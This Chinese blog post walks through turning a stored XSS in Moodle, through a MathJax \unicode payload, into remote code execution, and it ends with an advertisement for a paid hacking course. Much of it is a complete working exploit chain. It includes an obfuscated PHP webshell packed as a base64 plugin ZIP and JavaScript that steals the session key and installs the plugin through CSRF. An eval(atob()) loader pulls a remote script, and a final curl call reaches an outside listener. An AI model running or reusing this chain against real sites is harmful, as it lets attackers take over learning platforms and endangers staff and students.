RCE姿势学习:从存储型XSS漏洞到RCE利用

RCE姿势学习:从存储型XSS漏洞到RCE利用

很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSS来RCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。话不多说,进入正题:

本文所要介绍的测试网站是moodle。什么是moodle?Moodle是一个学习平台或课程管理系统(CMS)-一种免费的开源软件包,旨在帮助教育工作者根据合理的教学原则创建有效的在线课程。您可以在任何方便使用的计算机(包括网络主机)上下载和使用它,但它可以从单个教师站点扩展到200,000名学生的大学。Moodle拥有一个庞大而多样化的用户社区,在全球注册的100,000多个网站中,每个国家/地区使用的语言超过140种。-Moodle.org

由于当前的COVID-19,许多大学开始使用Moodle来支持其在线学习并将教学内容提供给在家的学生。我们看到一些伊拉克大学已经开始使用该平台,所以这让我们有动力开始寻找有趣的东西。由于在疫情期间,黑客可能会利用缺乏监控的优势,开始攻击学生和大学,所以我们应尽我们的本分,以白帽的方式为世界提供一些支持,这是我们道德工作的一部分。

开始测试

看一下平台统计信息。

众所周知,Moodle是一款流行的开源软件,吸引了不少网络犯罪分子和脚本小子的目光。相应地,许多开源贡献者也在为他做出更多的安全贡献。

在测试过程中,我们使用Moodle沙盒演示来了解平台的工作原理,并在浏览演示时进行了一些fuzz测试。现在,我们需要做的第一件事是检查平台的角色模型,去更好地了解每个角色的权限。然后,我们进一步下载了该项目的最新版本文件。最终我们决定研究具有最小特权角色的安全性问题(学生)。“学生”的角色已经被设定的权限很小,未被过滤的情况下能做的也只有小部分行为。

一开始,我们通过源代码审计扫描,已经发现了一些问题。但没法很好的利用,可以说这个项目非常成熟且安全设置做的也非常好了。

然后,我们又关注到了权限提升这个问题。从上一个漏洞之后,我们一直处于一个中间的位置,不能再进一步利用,直到我们再一次发现了一个有趣的输入点——资料编辑。

为防止垃圾邮件发送者滥用,平台将隐藏尚未注册任何课程的用户的个人资料描述。所以新用户必须添加至少一门课程才能添加资料信息描述。

所以,我们先创建了一个课程,并让测试“学生”账户加入该课程。并转到以下URL:

127.0.0.1/moodle/user/e

我们尝试了我们所知道的所有技巧来构造存储型XSS,但是在我更详细地阅读有关Moodle插件系统之后发现,它使用了Mathjax插件过滤器,所以我们的尝试都没有起作用。如果你使用以下格式来创建数学方程式:$$ x=1 $$,那么他呈现出来的就是:

根据SecurityMB的研究,任何小于2.7.4版本的Mathjax都有受到XSS攻击的风险。所以,我们查看了Moodle所使用的Mathjax插件信息,发现Mathjax默认情况下处于打开状态,而且使用的版本是2.7.2!

所以,根据先前已经被披露的攻击payload:$$ \unicode{<img src=1 onerror=alert(1)>} $$

我们实现了在Moodle中创建存储型XSS!

现在我们已经在系统中存储了XSS!这样我们就可以欺骗管理员访问我们的个人资料并触发攻击!

但是,仅仅是弹窗不足以满足这次冒险。我们要将这个漏洞再提升一个层次。

从XSS到RCE

我们已经发现了存储型DOM xss,因此我们可以通过这个漏洞获得cookie,但是Moodle中设置了HTTPonly,因此无法获取管理cookie。而且学校在使用过程中会设置仅支持列入白名单的IP地址可访问,所以我们现在还可以做些什么呢?

在上网的时候,我发现了一个Moodle安装插件远程命令执行的漏洞,这种攻击方式需要一个Admin用户来执行PHP命令,并在Moodle实例上上传shell,所以我们应该可以创建CSRF来做到这一点。

在上传插件之前,需要分多个阶段进行操作,因为它不是一个简单的CSRF页面。我们需要创建一个文件上传CSRF,并在上传CSRF之后创建两个步骤来执行我们的shell。

Ruby中存在一个漏洞利用程序,但它与我们的攻击媒介不同,以下是编写漏洞利用程序时遵循的步骤:

1.创建version.php/lang/en/block_rce.php归档以下内容:

block_rce.php使用@terjanq shell:

<?= $ _ = '$ <> /' ^ '{{{{' ; $ { $ _ } [ _ ]($ { $ _ } [ __ ]);

version.php

<?php 
$ plugin-> version = 2020051300;
$ plugin-> component ='block_rce'

2.压缩2个文件以创建 rce.zip

3.我们应该将文件rce.zip 从二进制格式更改为base64,我们使用了以下代码:

<script>
function onFileLoad(elementId, event) {
    document.getElementById(elementId).innerText = event.target.result;
}
function onChooseFile(event, onLoadFileHandler) {
    let input = event.target;
    let file = input.files[0];
    let fr = new FileReader();
    fr.onload = onLoadFileHandler;
    var fileContent = fr.readAsDataURL(file);
}
</script>

<input type='file' onchange='onChooseFile(event, onFileLoad.bind(this, "contents"))' />
<p id="contents"></p>
<!-- 
rce.zip to base64 

data:application/x-zip-compressed;base64,UEsDBAoAAAAAAHmCuFAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAACLhbhQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACADNoLlQGp+xOCMAAAAoAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsbdVibdVV7Gx01ePU68GAnVrlWqV+Nro+FgNKCM+VtMaAFBLAwQUAAAACACGhbhQ8uNzbUEAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDU0NjCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAAeYK4UAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGABsztMBzjHWAWzO0wHOMdYB7kmh/M0x1gFQSwECHwAKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgA7OKXLc0x1gHs4pctzTHWAcnriynNMdYBUEsBAh8ACgAAAAAAi4W4UAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAORxW27RMdYB5HFbbtEx1gGsuPYszTHWAVBLAQIfABQAAAAIAM2guVAan7E4IwAAACgAAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgAKwWc07Yy1gErBZzTtjLWAWqgKf/MMdYBUEsBAh8AFAAAAAgAhoW4UPLjc21BAAAASQAAAA8AJAAAAAAAAAAgAAAAzQAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAJX8ImnRMdYBlfwiadEx1gF4spXKzDHWAVBLBQYAAAAABQAFANsBAAA7AQAAAAA=

-->

4.编写完整的漏洞利用程序(您可以在此Github存储库中找到它):

 const URL = "http://127.0.0.1/moodle/"; // Change this to your target URL 
  fetch(URL + "admin/tool/installaddon/index.php", {
    credentials: "include",
  })
    .then((res) => {
      return res.text();
    })
    .then((data) => {
      let sesskey = data.split('"sesskey":"')[1].split('"')[0];
      let itemid = data.split("amp;itemid=")[1].split("&")[0];
      let author = data.split('title="View profile">')[1].split("<")[0];
      let clientid = data.split('client_id":"')[1].split('"')[0];
      // rce.zip 
      let url =
      "data:application/x-zip-compressed;base64,UEsDBAoAAAAAAHmCuFAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAACLhbhQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACADNoLlQGp+xOCMAAAAoAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsbdVibdVV7Gx01ePU68GAnVrlWqV+Nro+FgNKCM+VtMaAFBLAwQUAAAACACGhbhQ8uNzbUEAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDU0NjCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAAeYK4UAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGABsztMBzjHWAWzO0wHOMdYB7kmh/M0x1gFQSwECHwAKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgA7OKXLc0x1gHs4pctzTHWAcnriynNMdYBUEsBAh8ACgAAAAAAi4W4UAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAORxW27RMdYB5HFbbtEx1gGsuPYszTHWAVBLAQIfABQAAAAIAM2guVAan7E4IwAAACgAAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgAKwWc07Yy1gErBZzTtjLWAWqgKf/MMdYBUEsBAh8AFAAAAAgAhoW4UPLjc21BAAAASQAAAA8AJAAAAAAAAAAgAAAAzQAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAJX8ImnRMdYBlfwiadEx1gF4spXKzDHWAVBLBQYAAAAABQAFANsBAAA7AQAAAAA=";
      fetch(url)
        .then((res) => res.blob())
        .then((blob) => {
          const file = new File([blob], "rce.zip", {
            type: "application/x-zip-compressed",
          });
​
          myFormData = new FormData();
          myFormData.append("title", "");
          myFormData.append("author", author);
          myFormData.append("license", "allrightsreserved");
          myFormData.append("itemid", itemid);
          myFormData.append("accepted_types[]", ".zip");
          myFormData.append("repo_id", 4);
          myFormData.append("p", "");
          myFormData.append("page", "");
          myFormData.append("env", "filepicker");
          myFormData.append("sesskey", sesskey);
          myFormData.append("client_id", clientid);
          myFormData.append("maxbytes", -1);
          myFormData.append("areamaxbytes", -1);
          myFormData.append("ctx_id", 1);
          myFormData.append("savepath", "/");
          myFormData.append("repo_upload_file", file, "rce.zip");
​
          fetch(
            URL + "repository/repository_ajax.php?action=upload",
            {
              method: "post",
              body: myFormData,
              credentials: "include",
            }
          )
            .then((res) => {
              return res.text();
            })
            .then((res) => {
              let zipFile = res.split("draft\\/")[1].split("\\/")[0];
              myFormData = new FormData();
              myFormData.append("sesskey", sesskey);
              myFormData.append(
                "_qf__tool_installaddon_installfromzip_form",
                1
              );
              myFormData.append("mform_showmore_id_general", 1);
              myFormData.append("mform_isexpanded_id_general", 1);
              myFormData.append("zipfile", zipFile);
              myFormData.append("plugintype", "block");
              myFormData.append("rootdir", "");
              myFormData.append(
                "submitbutton",
                "Install+plugin+from+the+ZIP+file"
              );
​
              fetch(
                URL + "admin/tool/installaddon/index.php",
                {
                  method: "post",
                  body: myFormData,
                  credentials: "include",
                }
              )
                .then((res) => {
                  return res.text();
                })
                .then((res) => {
               //   debugger;
                  let installzipstorage = res
                    .split('installzipstorage" value="')[1]
                    .split('"')[0];
​
                  myFormData = new FormData();
                  myFormData.append("installzipcomponent", "block_rce");
                  myFormData.append("installzipstorage", installzipstorage);
                  myFormData.append("installzipconfirm", 1);
                  myFormData.append("sesskey", sesskey);
​
                  fetch(
                    URL + "admin/tool/installaddon/index.php",
                    {
                      method: "post",
                      body: myFormData,
                      credentials: "include",
                    }
                  ).then(() => {
                    fetch(
                      URL + "blocks/rce/lang/en/block_rce.php?_=system&__=curl%20http://192.168.153.138:1234/"
                    );
                  });
                });
            });
        });
    });

5.将此漏洞上传到跨站点主机 http://sandbox.ahussam.me/rce_moodle.js

6.编写触发器MathJax有效负载:

$$   \unicode{<img src='x' onerror='eval(`eval(atob("dmFyIG5ld1NjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOyBuZXdTY3JpcHQuc3JjID0gImh0dHA6Ly9zYW5kYm94LmFodXNzYW0ubWUvcmNlX21vb2RsZS5qcyI7IG1haW5jb250ZW50LmFwcGVuZENoaWxkKG5ld1NjcmlwdCk7"))`)'>} $$

7.使用先前的有效内容更新配置文件描述。

8.将URL发送给Admin用户并在端口1234上侦听

9.当管理员打开URL时,shell被上传,并且您获得curl连接

到这里,从存储型XSS到RCE的利用就已经介绍完了。下次再挖到XSS,你不妨试试先不忙着提交而是思考一下如何尽可能地扩大漏洞的影响。如果你这一块知识比较薄弱,可以考虑一下来二向箔安全学院系统的学习一下这方面的能力。二向箔安全的漏洞实战挖掘班会系统的从前后端编程开始学起,培养你的骇客思维去进行漏洞挖掘和利用而不只是依靠工具,已经有近百人在这个班级获得了质的飞跃:

感兴趣的话可以去twosecurity.cn了解一下,或者私信我哦~~

发布于 06-17

文章被以下专栏收录